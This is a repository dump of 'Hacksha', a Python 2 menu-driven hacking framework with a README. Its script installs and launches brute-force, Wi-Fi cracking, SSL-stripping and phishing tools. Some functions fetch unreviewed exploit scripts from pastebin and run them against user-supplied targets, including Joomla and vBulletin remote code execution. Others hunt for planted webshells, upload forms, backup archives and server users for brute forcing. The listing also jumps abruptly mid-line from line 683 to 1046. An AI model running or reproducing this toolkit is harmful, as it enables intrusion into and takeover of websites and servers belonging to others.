├── LICENSE ├── README.md ├── hacksha.py ├── install.sh └── update.sh /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2018 Mr. Shadab Mazhar 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |

Hi, I'm Shadab Mazhar!

2 |

3 |
4 | 5 |

6 | 7 | 8 | Instagram

9 | 10 | 11 | GitHub

12 | 13 |
14 |
15 | 16 | ### Hi 🙋‍♂️, 17 | ### I'm 18 years old Certified ethical hacker, CompTIA network+ cybersecurity professional and developer from India. 18 | 19 |
20 | 21 | 22 | **I am Into , 🙏** 23 |
24 | **Penetration testing, Bug Bounty hunting, Machine Learning, Web Development, Mobile Application Development, Cloud Computing, Linux, System Design & Programming** 25 | 26 | 27 |
28 | 29 | ************* 30 | 31 |
32 | 33 | ### Languages and Tools... 34 | 35 |

36 | Twitter Twitter Twitter Twitter Twitter Twitter Twitter Twitter 37 |

38 |

39 | 40 | 41 | 42 | 43 |

44 |

45 | 46 | *********************************** 47 | 48 | #### Thank You-🙏🏼 49 | 50 |

51 | 52 |

53 | 54 | 55 | Shadab The Hacker...... 56 | 57 |

58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 |

74 | 75 | *** 76 | 77 | # About This Tool 78 | 79 | ``` 80 | Bunch Of Pentesing Tools That All Hacker Needs. 81 | ``` 82 | 83 | *** 84 | 85 | # Getting started 86 | 87 | ## System requirements 88 | 89 | ``` 90 | Hacksha Framework supports all unix based operating Systems 91 | ``` 92 | *** 93 | 94 | ## HackSha Menu : 95 | 96 | - Information Gathering 97 | - Password Attacks 98 | - Wireless Testing 99 | - Exploitation Tools 100 | - Sniffing & Spoofing 101 | - Web Hacking 102 | - Private Web Hacking 103 | - Post Exploitation 104 | - Install The HACKSHA 105 | 106 | ### Information Gathering: 107 | 108 | - Nmap 109 | - Setoolkit 110 | - Port Scanning 111 | - Host To IP 112 | - wordpress user 113 | - CMS scanner 114 | - XSStrike 115 | - Dork - Google Dorks Passive Vulnerability Auditor 116 | - Scan A server's Users 117 | - Crips 118 | 119 | ### Password Attacks: 120 | 121 | - Cupp 122 | - Ncrack 123 | 124 | ### Wireless Testing: 125 | 126 | - reaver 127 | - pixiewps 128 | - Fluxion 129 | 130 | ### Exploitation Tools: 131 | 132 | - ATSCAN 133 | - sqlmap 134 | - Shellnoob 135 | - commix 136 | - FTP Auto Bypass 137 | - jboss-autopwn 138 | 139 | ### Sniffing & Spoofing: 140 | 141 | - Setoolkit 142 | - SSLtrip 143 | - pyPISHER 144 | - SMTP Mailer 145 | 146 | ### Web Hacking: 147 | 148 | - Drupal Hacking 149 | - Inurlbr 150 | - Wordpress & Joomla Scanner 151 | - Gravity Form Scanner 152 | - File Upload Checker 153 | - Wordpress Exploit Scanner 154 | - Wordpress Plugins Scanner 155 | - Shell and Directory Finder 156 | - Joomla! 1.5 - 3.4.5 remote code execution 157 | - Vbulletin 5.X remote code execution 158 | - BruteX - Automatically brute force all services running on a target 159 | - Arachni - Web Application Security Scanner Framework 160 | 161 | ### Private Web Hacking: 162 | 163 | - Get all websites 164 | - Get joomla websites 165 | - Get wordpress websites 166 | - Control Panel Finder 167 | - Zip Files Finder 168 | - Upload File Finder 169 | - Get server users 170 | - SQli Scanner 171 | - Ports Scan (range of ports) 172 | - ports Scan (common ports) 173 | - Get server Info 174 | - Bypass Cloudflare 175 | 176 | ### Post Exploitation: 177 | 178 | - Shell Checker 179 | - POET 180 | - Weeman 181 | 182 | 183 | 184 | ## HackSha Tool installation 185 | 186 | ``` 187 | > apt-get update -y 188 | 189 | > apt-get install python2 -y 190 | 191 | > apt-get install git -y 192 | 193 | > git clone https://github.com/hackyshadab/Hacksha.git 194 | 195 | > cd Hacksha 196 | 197 | > chmod +x install.sh 198 | 199 | > ./install.sh 200 | 201 | > python hacksha.py 202 | 203 | ``` 204 | ## HackSha Tool installation (Termux) 205 | ``` 206 | pkg install git 207 | 208 | pkg install python 209 | 210 | git clone https://github.com/hackyshadab/Hacksha 211 | 212 | cd Hacksha 213 | 214 | chmod +x Hacksha.py 215 | 216 | python2 Hacksha.py 217 | ``` 218 | 219 | # Brutexsha Framework disclaimer 220 | 221 | ``` 222 | Usage of the HackSha Framework for attacking targets without prior mutual consent is illegal. 223 | It is the end user's responsibility to obey all applicable local, state, federal, and international laws. 224 | Developers assume no liability and are not responsible for any misuse or damage caused by this program. 225 | ``` 226 | ``` 227 | Also, we do not recommend to change the source code of HackSha because --> 228 | it is very complex and you can mess up something and disrupt the framework! 229 | ``` 230 | ## License : 231 | 232 | [MIT Licence](https://github.com/hackyshadab/Hacksha/blob/main/LICENSE) 233 | 234 | That's It... If You Like This Repository. Please Share This With Your Friends.. 235 | 236 | 237 | 238 | ***Thankyou...*** 239 | ***Keep Visiting..*** 240 | ***Enjoy...*** 241 | ***Shadab The Hacker......*** 242 | ******* 243 | -------------------------------------------------------------------------------- /hacksha.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import argparse 3 | import os 4 | import time 5 | import httplib 6 | import subprocess 7 | import re 8 | import urllib2 9 | import socket 10 | import urllib 11 | import sys 12 | import json 13 | import telnetlib 14 | import glob 15 | import random 16 | import Queue 17 | import threading 18 | #import requests 19 | import base64 20 | from getpass import getpass 21 | from commands import * 22 | from sys import argv 23 | from platform import system 24 | from urlparse import urlparse 25 | from xml.dom import minidom 26 | from optparse import OptionParser 27 | from time import sleep 28 | ########################## 29 | os.system('clear') 30 | 31 | 32 | def menu(): 33 | print (""" 34 | MIT License 35 | Copyright (c) 2020 HACKSHA by SHADAB 36 | Permission is hereby granted, free of charge, to any person obtaining a copy 37 | of this software and associated documentation files (the "Software"), to deal 38 | in the Software without restriction, including without limitation the rights 39 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 40 | copies of the Software, and to permit persons to whom the Software is 41 | furnished to do so, subject to the following conditions: 42 | The above copyright notice and this permission notice shall be included in all 43 | copies or substantial portions of the Software. 44 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 45 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 46 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 47 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 48 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 49 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 50 | SOFTWARE.""") 51 | 52 | 53 | os.system('clear') 54 | os.system('clear') 55 | os.system('clear') 56 | os.system('clear') 57 | 58 | directories = ['/uploads/', '/upload/', '/files/', '/resume/', '/resumes/', '/documents/', '/docs/', '/pictures/', '/file/', '/Upload/', '/Uploads/', '/Resume/', '/Resume/', '/UsersFiles/', '/Usersiles/', '/usersFiles/', '/Users_Files/', '/UploadedFiles/', 59 | '/Uploaded_Files/', '/uploadedfiles/', '/uploadedFiles/', '/hpage/', '/admin/upload/', '/admin/uploads/', '/admin/resume/', '/admin/resumes/', '/admin/pictures/', '/pics/', '/photos/', '/Alumni_Photos/', '/alumni_photos/', '/AlumniPhotos/', '/users/'] 60 | shells = ['wso.php', 'shell.php', 'an.php', 'hacker.php', 'lol.php', 'up.php', 'cp.php', 'upload.php', 61 | 'sh.php', 'pk.php', 'mad.php', 'x00x.php', 'worm.php', '1337worm.php', 'config.php', 'x.php', 'haha.php'] 62 | upload = [] 63 | yes = set(['yes', 'y', 'ye', 'Y']) 64 | no = set(['no', 'n']) 65 | 66 | 67 | def logo(): 68 | print """ 69 | - Powered by 70 | __ __ ____ _ _ _ ____ _ ____ 71 | | \/ |_ __ / ___|| | | | / \ | _ \ / \ | __ ) 72 | | |\/| | '__| \___ \| |_| | / _ \ | | | |/ _ \ | _ \ 73 | | | | | | _ ___) | _ |/ ___ \| |_| / ___ \| |_) | 74 | |_| |_|_|(_) |____/|_| |_/_/ \_\____/_/ \_\____/ 75 | """ 76 | 77 | 78 | 79 | hackshalogo = """\033[0m 80 | _ _ _ ____ _ 81 | | | | | __ _ ___| | __/ ___|| |__ __ _ 82 | | |_| |/ _` |/ __| |/ /\___ \| '_ \ / _` | 83 | | _ | (_| | (__| < ___) | | | | (_| | 84 | |_| |_|\__,_|\___|_|\_\|____/|_| |_|\__,_| 85 | THE ULTIMATE SOURCE OF HACKING 86 | -----POWERED BY SHADAB THE HACKER........ 87 | \033[91m""" 88 | def menu(): 89 | print (hackshalogo + """\033[1m 90 | [!] This Tool Must Run As ROOT [!] By SHADAB The Hacker......... 91 | \033[0m 92 | {1}--Information Gathering 93 | {2}--Password Attacks 94 | {3}--Wireless Testing 95 | {4}--Exploitation Tools 96 | {5}--Sniffing & Spoofing 97 | {6}--Web Hacking 98 | {7}--Private Web Hacking 99 | {8}--Post Exploitation 100 | {0}--Install The HACKSHA 101 | {99}-Exit 102 | """) 103 | choice = raw_input("hacksha~# ") 104 | os.system('clear') 105 | if choice == "1": 106 | info() 107 | elif choice == "2": 108 | passwd() 109 | elif choice == "3": 110 | wire() 111 | elif choice == "4": 112 | exp() 113 | elif choice == "5": 114 | snif() 115 | elif choice == "6": 116 | webhack() 117 | elif choice == "7": 118 | dzz() 119 | elif choice == "8": 120 | postexp() 121 | elif choice == "0": 122 | updatehacksha() 123 | elif choice == "99": 124 | clearScr(), sys.exit() 125 | elif choice == "": 126 | menu() 127 | else: 128 | menu() 129 | 130 | 131 | def updatehacksha(): 132 | print ("This Tool is Only Available for Linux and Similar Systems. ") 133 | choiceupdate = raw_input("Continue Y / N: ") 134 | if choiceupdate in yes: 135 | os.system("git clone https://github.com/hackyshadab/Hacksha.git") 136 | os.system("cd hacksha && sudo bash ./update.sh") 137 | os.system("hacksha") 138 | 139 | 140 | def doork(): 141 | print("doork is a open-source passive vulnerability auditor tool that automates the process of searching on Google information about specific website based on dorks. ") 142 | doorkchice = raw_input("Continue Y / N: ") 143 | if doorkchice in yes: 144 | os.system("pip install beautifulsoup4 && pip install requests") 145 | os.system("git clone https://github.com/AeonDave/doork") 146 | clearScr() 147 | doorkt = raw_input("Target : ") 148 | os.system("cd doork && python doork.py -t %s -o log.log" % doorkt) 149 | 150 | 151 | def postexp(): 152 | clearScr() 153 | print(hackshalogo) 154 | print(" {1}--Shell Checker") 155 | print(" {2}--POET") 156 | print(" {3}--Phishing Framework \n") 157 | print(" {99}-Return to main menu \n\n ") 158 | choice11 = raw_input("hacksha~# ") 159 | os.system('clear') 160 | if choice11 == "1": 161 | sitechecker() 162 | if choice11 == "2": 163 | poet() 164 | if choice11 == "3": 165 | weeman() 166 | elif choice11 == "99": 167 | menu() 168 | 169 | 170 | def scanusers(): 171 | site = raw_input('Enter a website : ') 172 | try: 173 | users = site 174 | if 'http://www.' in users: 175 | users = users.replace('http://www.', '') 176 | if 'http://' in users: 177 | users = users.replace('http://', '') 178 | if '.' in users: 179 | users = users.replace('.', '') 180 | if '-' in users: 181 | users = users.replace('-', '') 182 | if '/' in users: 183 | users = users.replace('/', '') 184 | while len(users) > 2: 185 | print users 186 | resp = urllib2.urlopen( 187 | site + '/cgi-sys/guestbook.cgi?user=%s' % users).read() 188 | 189 | if 'invalid username' not in resp.lower(): 190 | print "\tFound -> %s" % users 191 | pass 192 | 193 | users = users[:-1] 194 | except: 195 | pass 196 | 197 | 198 | def brutex(): 199 | clearScr() 200 | print("Automatically brute force all services running on a target : Open ports / DNS domains / Usernames / Passwords ") 201 | os.system("git clone https://github.com/1N3/BruteX.git") 202 | clearScr() 203 | brutexchoice = raw_input("Select a Target : ") 204 | os.system("cd BruteX && chmod 777 brutex && ./brutex %s" % brutexchoice) 205 | 206 | 207 | def arachni(): 208 | print("Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications") 209 | cara = raw_input("Install And Run ? Y / N : ") 210 | clearScr() 211 | print("exemple : http://www.target.com/") 212 | tara = raw_input("Select a target to scan : ") 213 | if cara in yes: 214 | os.system("git clone git://github.com/Arachni/arachni.git") 215 | os.system( 216 | "cd arachni && sudo gem install bundler && bundle install --without prof && rake install") 217 | os.system("archani") 218 | clearScr() 219 | os.system("cd arachni/bin && chmod 777 arachni && ./arachni %s" % tara) 220 | 221 | 222 | def XSStrike(): 223 | clearScr() 224 | print("XSStrike is a python script designed to detect and exploit XSS vulnerabilites. Follow The Owner On Github @UltimateHackers") 225 | os.system("sudo rm -rf XSStrike") 226 | os.system("git clone https://github.com/UltimateHackers/XSStrike.git && cd XSStrike && pip install -r requirements.txt && clear && python xsstrike") 227 | 228 | 229 | def crips(): 230 | clearScr() 231 | os.system("git clone https://github.com/Manisso/Crips.git") 232 | os.system("cd Crips && sudo bash ./update.sh") 233 | os.system("crips") 234 | os.system("clear") 235 | 236 | 237 | def weeman(): 238 | print("HTTP server for phishing in python. (and framework) Usually you will want to run Weeman with DNS spoof attack. (see dsniff, ettercap).") 239 | choicewee = raw_input("Install Weeman ? Y / N : ") 240 | if choicewee in yes: 241 | os.system( 242 | "git clone https://github.com/samyoyo/weeman.git && cd weeman && python weeman.py") 243 | if choicewee in no: 244 | menu() 245 | else: 246 | menu() 247 | 248 | 249 | def gabriel(): 250 | print("Abusing authentication bypass of Open&Compact (Gabriel's)") 251 | os.system("wget http://pastebin.com/raw/Szg20yUh --output-document=gabriel.py") 252 | clearScr() 253 | os.system("python gabriel.py") 254 | ftpbypass = raw_input("Enter Target IP and Use Command :") 255 | os.system("python gabriel.py %s" % ftpbypass) 256 | 257 | 258 | def sitechecker(): 259 | os.system("wget http://pastebin.com/raw/Y0cqkjrj --output-document=ch01.py") 260 | clearScr() 261 | os.system("python ch01.py") 262 | 263 | 264 | def h2ip(): 265 | host = raw_input("Select A Host : ") 266 | ips = socket.gethostbyname(host) 267 | print(ips) 268 | 269 | 270 | def ports(): 271 | clearScr() 272 | target = raw_input('Select a Target IP : ') 273 | os.system("nmap -O -Pn %s" % target) 274 | sys.exit() 275 | 276 | 277 | def ifinurl(): 278 | print""" This Advanced search in search engines, enables analysis provided to exploit GET / POST capturing emails & urls, with an internal custom validation junction for each target / url found.""" 279 | print('Do You Want To Install InurlBR ? ') 280 | cinurl = raw_input("Y/N: ") 281 | if cinurl in yes: 282 | inurl() 283 | if cinurl in no: 284 | menu() 285 | elif cinurl == "": 286 | menu() 287 | else: 288 | menu() 289 | 290 | 291 | def bsqlbf(): 292 | clearScr() 293 | print("This tool will only work on blind sql injection") 294 | cbsq = raw_input("select target : ") 295 | os.system("wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/bsqlbf-v2/bsqlbf-v2-7.pl -o bsqlbf.pl") 296 | os.system("perl bsqlbf.pl -url %s" % cbsq) 297 | os.system("rm bsqlbf.pl") 298 | 299 | 300 | def atscan(): 301 | print ("Do You To Install ATSCAN ?") 302 | choiceshell = raw_input("Y/N: ") 303 | if choiceshell in yes: 304 | os.system("sudo rm -rf ATSCAN") 305 | os.system( 306 | "git clone https://github.com/AlisamTechnology/ATSCAN.git && cd ATSCAN && perl atscan.pl") 307 | elif choiceshell in no: 308 | os.system('clear') 309 | menu() 310 | 311 | 312 | def commix(): 313 | print ("Automated All-in-One OS Command Injection and Exploitation Tool.") 314 | print ("usage : python commix.py --help") 315 | choicecmx = raw_input("Continue: y/n :") 316 | if choicecmx in yes: 317 | os.system("git clone https://github.com/stasinopoulos/commix.git commix") 318 | os.system("cd commix") 319 | os.system("python commix.py") 320 | os.system("") 321 | elif choicecmx in no: 322 | os.system('clear') 323 | info() 324 | 325 | 326 | def pixiewps(): 327 | print"""Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some Access Points, the so-called "pixie dust attack" discovered by Dominique Bongard in summer 2014. It is meant for educational purposes only 328 | """ 329 | choicewps = raw_input("Continue ? Y/N : ") 330 | if choicewps in yes: 331 | os.system("git clone https://github.com/wiire/pixiewps.git") 332 | os.system("cd pixiewps & make ") 333 | os.system("sudo make install") 334 | if choicewps in no: 335 | menu() 336 | elif choicewps == "": 337 | menu() 338 | else: 339 | menu() 340 | 341 | 342 | def webhack(): 343 | print(hackshalogo) 344 | print(" {1}--Drupal Hacking ") 345 | print(" {2}--Inurlbr") 346 | print(" {3}--Wordpress & Joomla Scanner") 347 | print(" {4}--Gravity Form Scanner") 348 | print(" {5}--File Upload Checker") 349 | print(" {6}--Wordpress Exploit Scanner") 350 | print(" {7}--Wordpress Plugins Scanner") 351 | print(" {8}--Shell and Directory Finder") 352 | print(" {9}--Joomla! 1.5 - 3.4.5 remote code execution") 353 | print(" {10}-Vbulletin 5.X remote code execution") 354 | print( 355 | " {11}-BruteX - Automatically brute force all services running on a target") 356 | print(" {12}-Arachni - Web Application Security Scanner Framework \n ") 357 | print(" {99}-Back To Main Menu \n") 358 | choiceweb = raw_input("hacksha~# ") 359 | if choiceweb == "1": 360 | clearScr() 361 | maine() 362 | if choiceweb == "2": 363 | clearScr() 364 | ifinurl() 365 | if choiceweb == '3': 366 | clearScr() 367 | wppjmla() 368 | if choiceweb == "4": 369 | clearScr() 370 | gravity() 371 | if choiceweb == "5": 372 | clearScr() 373 | sqlscan() 374 | if choiceweb == "6": 375 | clearScr() 376 | wpminiscanner() 377 | if choiceweb == "7": 378 | clearScr() 379 | wppluginscan() 380 | if choiceweb == "8": 381 | clearScr() 382 | shelltarget() 383 | if choiceweb == "9": 384 | clearScr() 385 | joomlarce() 386 | if choiceweb == "10": 387 | clearScr() 388 | vbulletinrce() 389 | if choiceweb == "11": 390 | clearScr() 391 | brutex() 392 | if choiceweb == "12": 393 | clearScr() 394 | arachni() 395 | elif choiceweb == "99": 396 | menu() 397 | elif choiceweb == "": 398 | menu() 399 | else: 400 | menu() 401 | 402 | 403 | def vbulletinrce(): 404 | os.system("wget http://pastebin.com/raw/eRSkgnZk --output-document=tmp.pl") 405 | os.system("perl tmp.pl") 406 | 407 | 408 | def joomlarce(): 409 | os.system("wget http://pastebin.com/raw/EX7Gcbxk --output-document=temp.py") 410 | clearScr() 411 | print("if the response is 200 , you will find your shell in Joomla_3.5_Shell.txt") 412 | jmtarget = raw_input("Select a targets list :") 413 | os.system("python temp.py %s" % jmtarget) 414 | 415 | 416 | def inurl(): 417 | dork = raw_input("select a Dork:") 418 | output = raw_input("select a file to save :") 419 | os.system( 420 | "./inurlbr.php --dork '{0}' -s {1}.txt -q 1,6 -t 1".format(dork, output)) 421 | if cinurl in no: 422 | insinurl() 423 | elif cinurl == "": 424 | menu() 425 | else: 426 | menu() 427 | 428 | 429 | def insinurl(): 430 | os.system("git clone https://github.com/googleinurl/SCANNER-INURLBR.git") 431 | os.system("chmod +x SCANNER-INURLBR/inurlbr.php") 432 | os.system("apt-get install curl libcurl3 libcurl3-dev php5 php5-cli php5-curl") 433 | os.system("mv /SCANNER-INURLBR/inurbr.php inurlbr.php") 434 | clearScr() 435 | inurl() 436 | 437 | 438 | def nmap(): 439 | 440 | choice7 = raw_input("continue ? Y / N : ") 441 | if choice7 in yes: 442 | os.system("git clone https://github.com/nmap/nmap.git") 443 | os.system("cd nmap && ./configure && make && make install") 444 | elif choice7 in no: 445 | info() 446 | elif choice7 == "": 447 | menu() 448 | else: 449 | menu() 450 | 451 | 452 | def jboss(): 453 | os.system('clear') 454 | print ("This JBoss script deploys a JSP shell on the target JBoss AS server. Once") 455 | print ("deployed, the script uses its upload and command execution capability to") 456 | print ("provide an interactive session.") 457 | print ("") 458 | print ("usage : ./e.sh target_ip tcp_port ") 459 | print("Continue: y/n") 460 | choice9 = raw_input("yes / no :") 461 | if choice9 in yes: 462 | os.system( 463 | "git clone https://github.com/SpiderLabs/jboss-autopwn.git"), sys.exit() 464 | elif choice9 in no: 465 | os.system('clear') 466 | exp() 467 | elif choice9 == "": 468 | menu() 469 | else: 470 | menu() 471 | 472 | 473 | def wppluginscan(): 474 | Notfound = [404, 401, 400, 403, 406, 301] 475 | sitesfile = raw_input("sites file : ") 476 | filepath = raw_input("Plugins File : ") 477 | 478 | def scan(site, dir): 479 | global resp 480 | try: 481 | conn = httplib.HTTPConnection(site) 482 | conn.request('HEAD', "/wp-content/plugins/" + dir) 483 | resp = conn.getresponse().status 484 | except(), message: 485 | print "Cant Connect :", message 486 | pass 487 | 488 | def timer(): 489 | now = time.localtime(time.time()) 490 | return time.asctime(now) 491 | 492 | def main(): 493 | sites = open(sitesfile).readlines() 494 | plugins = open(filepath).readlines() 495 | for site in sites: 496 | site = site.rstrip() 497 | for plugin in plugins: 498 | plugin = plugin.rstrip() 499 | scan(site, plugin) 500 | if resp not in Notfound: 501 | print "+----------------------------------------+" 502 | print "| current site :" + site 503 | print "| Found Plugin : " + plugin 504 | print "| Result:", resp 505 | 506 | 507 | def sqlmap(): 508 | print ("usage : python sqlmap.py -h") 509 | choice8 = raw_input("Continue: y/n :") 510 | if choice8 in yes: 511 | os.system( 512 | "git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev & ") 513 | elif choice8 in no: 514 | os.system('clear') 515 | info() 516 | elif choice8 == "": 517 | menu() 518 | else: 519 | menu() 520 | 521 | 522 | def grabuploadedlink(url): 523 | try: 524 | for dir in directories: 525 | currentcode = urllib.urlopen(url + dir).getcode() 526 | if currentcode == 200 or currentcode == 403: 527 | print "-------------------------" 528 | print " [ + ] Found Directory : " + str(url + dir) + " [ + ]" 529 | print "-------------------------" 530 | upload.append(url + dir) 531 | except: 532 | pass 533 | 534 | 535 | def grabshell(url): 536 | try: 537 | for upl in upload: 538 | for shell in shells: 539 | currentcode = urllib.urlopen(upl + shell).getcode() 540 | if currentcode == 200: 541 | print "-------------------------" 542 | print " [ ! ] Found Shell : " + str(upl + shell) + " [ ! ]" 543 | print "-------------------------" 544 | except: 545 | pass 546 | 547 | 548 | def shelltarget(): 549 | print("exemple : http://target.com") 550 | line = raw_input("target : ") 551 | line = line.rstrip() 552 | grabuploadedlink(line) 553 | grabshell(line) 554 | 555 | 556 | def poet(): 557 | print("POET is a simple POst-Exploitation Tool.") 558 | print("") 559 | choicepoet = raw_input("y / n :") 560 | if choicepoet in yes: 561 | os.system("git clone https://github.com/mossberg/poet.git") 562 | os.system("python poet/server.py") 563 | if choicepoet in no: 564 | clearScr() 565 | postexp() 566 | elif choicepoet == "": 567 | menu() 568 | else: 569 | menu() 570 | 571 | 572 | def setoolkit(): 573 | print ("The Social-Engineer Toolkit is an open-source penetration testing framework") 574 | print(") designed for social engineering. SET has a number of custom attack vectors that ") 575 | print(" allow you to make a believable attack quickly. SET is a product of TrustedSec, LLC ") 576 | print("an information security consulting firm located in Cleveland, Ohio.") 577 | print("") 578 | 579 | choiceset = raw_input("y / n :") 580 | if choiceset in yes: 581 | os.system( 582 | "git clone https://github.com/trustedsec/social-engineer-toolkit.git") 583 | os.system("python social-engineer-toolkit/setup.py") 584 | if choiceset in no: 585 | clearScr() 586 | info() 587 | elif choiceset == "": 588 | menu() 589 | else: 590 | menu() 591 | 592 | 593 | def cupp(): 594 | print("cupp is a password list generator ") 595 | print("Usage: python cupp.py -h") 596 | choicecupp = raw_input("Continue: y/n : ") 597 | 598 | if choicecupp in yes: 599 | os.system("git clone https://github.com/Mebus/cupp.git") 600 | print("file downloaded successfully") 601 | elif choicecupp in no: 602 | clearScr() 603 | passwd() 604 | elif choicecupp == "": 605 | menu() 606 | else: 607 | menu() 608 | 609 | 610 | def ncrack(): 611 | print("A Ruby interface to Ncrack, Network authentication cracking tool.") 612 | print("requires : nmap >= 0.3ALPHA / rprogram ~> 0.3") 613 | print("Continue: y/n") 614 | choicencrack = raw_input("y / n :") 615 | if choicencrack in yes: 616 | os.system("git clone https://github.com/sophsec/ruby-ncrack.git") 617 | os.system("cd ruby-ncrack") 618 | os.system("install ruby-ncrack") 619 | elif choicencrack in no: 620 | clearScr() 621 | passwd() 622 | elif choicencrack == "": 623 | menu() 624 | else: 625 | menu() 626 | 627 | 628 | def reaver(): 629 | print """ 630 | Reaver has been designed to be a robust and practical attack against Wi-Fi Protected Setup 631 | WPS registrar PINs in order to recover WPA/WPA2 passphrases. It has been tested against a 632 | wide variety of access points and WPS implementations 633 | 1 to accept / 0 to decline 634 | """ 635 | creaver = raw_input("y / n :") 636 | if creaver in yes: 637 | os.system( 638 | "apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps") 639 | os.system("git clone https://github.com/t6x/reaver-wps-fork-t6x.git") 640 | os.system("cd reaver-wps-fork-t6x/src/ & ./configure") 641 | os.system("cd reaver-wps-fork-t6x/src/ & make") 642 | elif creaver in no: 643 | clearScr() 644 | wire() 645 | elif creaver == "": 646 | menu() 647 | else: 648 | menu() 649 | 650 | 651 | def ssls(): 652 | print"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping 653 | attacks. 654 | It requires Python 2.5 or newer, along with the 'twisted' python module.""" 655 | cssl = raw_input("y / n :") 656 | if cssl in yes: 657 | os.system("git clone https://github.com/moxie0/sslstrip.git") 658 | os.system("sudo apt-get install python-twisted-web") 659 | os.system("python sslstrip/setup.py") 660 | if cssl in no: 661 | snif() 662 | elif cssl == "": 663 | menu() 664 | else: 665 | menu() 666 | 667 | 668 | def unique(seq): 669 | seen = set() 670 | return [seen.add(x) or x for x in seq if x not in seen] 671 | 672 | 673 | def bing_all_grabber(s): 674 | 675 | lista = [] 676 | page = 1 677 | while page <= 101: 678 | try: 679 | bing = "http://www.bing.com/search?q=ip%3A" + \ 680 | s + "+&count=50&first=" + str(page) 681 | openbing = urllib2.urlopen(bing) 682 | readbing = openbing.read() 683 | findwebs = re.findall('

') 1046 | self.portScanner(1, ran) 1047 | elif choice == '10': 1048 | self.portScanner(2, None) 1049 | elif choice == '11': 1050 | self.getServerBanner() 1051 | elif choice == '12': 1052 | self.cloudflareBypasser() 1053 | elif choice == '99': 1054 | menu() 1055 | con = raw_input(' Continue [Y/n] -> ') 1056 | if con[0].upper() == 'N': 1057 | exit() 1058 | else: 1059 | clearScr() 1060 | print menuu 1061 | 1062 | def getSites(self, a): 1063 | """ 1064 | get all websites on same server 1065 | from bing search 1066 | """ 1067 | lista = [] 1068 | page = 1 1069 | while page <= 101: 1070 | try: 1071 | bing = "http://www.bing.com/search?q=ip%3A" + \ 1072 | self.serverip + "+&count=50&first=" + str(page) 1073 | openbing = urllib2.urlopen(bing) 1074 | readbing = openbing.read() 1075 | findwebs = re.findall('
", site + admin 1167 | except IOError: 1168 | pass 1169 | ############################ 1170 | # find ZIP files 1171 | 1172 | def findZip(self): 1173 | """ 1174 | find zip files from grabbed websites 1175 | it may contain useful informations 1176 | """ 1177 | zipList = ['backup.tar.gz', 'backup/backup.tar.gz', 'backup/backup.zip', 'vb/backup.zip', 'site/backup.zip', 'backup.zip', 'backup.rar', 'backup.sql', 'vb/vb.zip', 'vb.zip', 'vb.sql', 'vb.rar', 1178 | 'vb1.zip', 'vb2.zip', 'vbb.zip', 'vb3.zip', 'upload.zip', 'up/upload.zip', 'joomla.zip', 'joomla.rar', 'joomla.sql', 'wordpress.zip', 'wp/wordpress.zip', 'blog/wordpress.zip', 'wordpress.rar'] 1179 | clearScr() 1180 | print "[~] Finding zip file" 1181 | for site in self.sites: 1182 | for zip1 in zipList: 1183 | try: 1184 | if urllib.urlopen(site + zip1).getcode() == 200: 1185 | print " [] Found zip file -> ", site + zip1 1186 | except IOError: 1187 | pass 1188 | 1189 | def findUp(self): 1190 | """ 1191 | find upload forms from grabbed 1192 | websites the attacker may succeed to 1193 | upload malicious files like webshells 1194 | """ 1195 | upList = ['up.php', 'up1.php', 'up/up.php', 'site/up.php', 'vb/up.php', 'forum/up.php', 'blog/up.php', 'upload.php', 1196 | 'upload1.php', 'upload2.php', 'vb/upload.php', 'forum/upload.php', 'blog/upload.php', 'site/upload.php', 'download.php'] 1197 | clearScr() 1198 | print "[~] Finding Upload" 1199 | for site in self.sites: 1200 | for up in upList: 1201 | try: 1202 | if (urllib.urlopen(site + up).getcode() == 200): 1203 | html = urllib.urlopen(site + up).readlines() 1204 | for line in html: 1205 | if re.findall('type=file', line): 1206 | print " [] Found upload -> ", site + up 1207 | except IOError: 1208 | pass 1209 | 1210 | def getUsers(self): 1211 | """ 1212 | get server users using a method found by 1213 | iranian hackers , the attacker may 1214 | do a bruteforce attack on CPanel, ssh, ftp or 1215 | even mysql if it supports remote login 1216 | (you can use medusa or hydra) 1217 | """ 1218 | clearScr() 1219 | print "[~] Grabbing Users" 1220 | userslist = [] 